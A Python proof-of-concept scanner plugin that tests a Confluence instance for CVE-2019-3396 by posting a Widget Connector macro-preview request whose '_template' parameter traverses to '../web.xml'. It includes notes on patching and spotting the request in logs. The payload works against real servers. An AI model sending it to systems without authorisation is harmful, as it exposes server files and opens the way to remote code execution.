# Author:w7ay
# Refer:https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
import HackRequests

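def poc(arg, **kwargs):
    """Check one Confluence base URL for CVE-2019-3396 (Widget Connector).

    The check sends a single macro-preview request whose widget macro sets
    the ``_template`` parameter to ``../web.xml``. If the server answers
    200 and the body contains ``</web-app>``, the template parameter was
    resolved to the deployment descriptor, and the target is reported as
    affected.

    Defensive notes: a finding means the instance should be moved to a
    release listed as fixed in the vendor advisory for CVE-2019-3396. The
    same request shape (POST to ``/rest/tinymce/1/macro/preview`` with a
    ``_template`` key inside the widget macro params) is what to look for
    in proxy/WAF and access logs.

    Args:
        arg: Base URL of the Confluence instance, with or without a
            trailing slash.
        **kwargs: Accepted but not used by this check.

    Returns:
        A dict with ``name``, ``content``, ``url``, ``log`` and ``tag`` when
        the response matches, otherwise ``None``.
    """
    # Strip trailing slashes so "http://host/" does not produce
    # "http://host//rest/..." in the request URL and the Referer.
    base = arg.rstrip("/")
    headers = '''
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Referer: {}/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
    '''.format(base)
    # Relative path used as the template; the check only asks for this file
    # to be rendered back in the response.
    filename = "../web.xml"
    data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    hh = HackRequests.http(url=base + "/rest/tinymce/1/macro/preview", post=data, headers=headers)
    # "</web-app>" is the closing tag of a servlet deployment descriptor;
    # seeing it in a 200 response is the evidence used for the finding.
    if hh.status_code == 200 and "</web-app>" in hh.text():
        # Report text (Chinese). English summary: on 2019-03-28 Confluence
        # published an advisory for a server-side template injection in the
        # Widget Connector of Confluence Server and Data Center, allowing
        # path traversal and remote code execution, tracked as
        # CVE-2019-3396. The identifier was written "CVE2019-3396" before;
        # it is corrected here so the report text matches the real CVE ID.
        desc = '''2019 年 3 月 28 日，Confluence 官方发布预警 ，指出 Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞，攻击 者能利用此漏洞能够实现目录穿越与远程代码执行，同时该漏洞被赋予编号 CVE-2019-3396。'''
        result = {
            "name": "Confluence Widget Connector path traversal (CVE-2019-3396)",  # plugin / finding name
            "content": desc,  # finding details: what the issue is and its impact
            "url": arg,  # URL where the issue was observed, as passed in by the caller
            "log": hh.log,  # request/response log object exposed by HackRequests
            "tag": "path traversal"  # finding category tag
        }
        return result
    # No match: make the "not affected / not confirmed" outcome explicit.
    return None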


if __name__ == "__main__":
    # Intentionally a no-op: running this file directly performs no check.
    # NOTE(review): presumably poc() is meant to be imported and called by a
    # scanner framework with the target URL; confirm against the loader.
    pass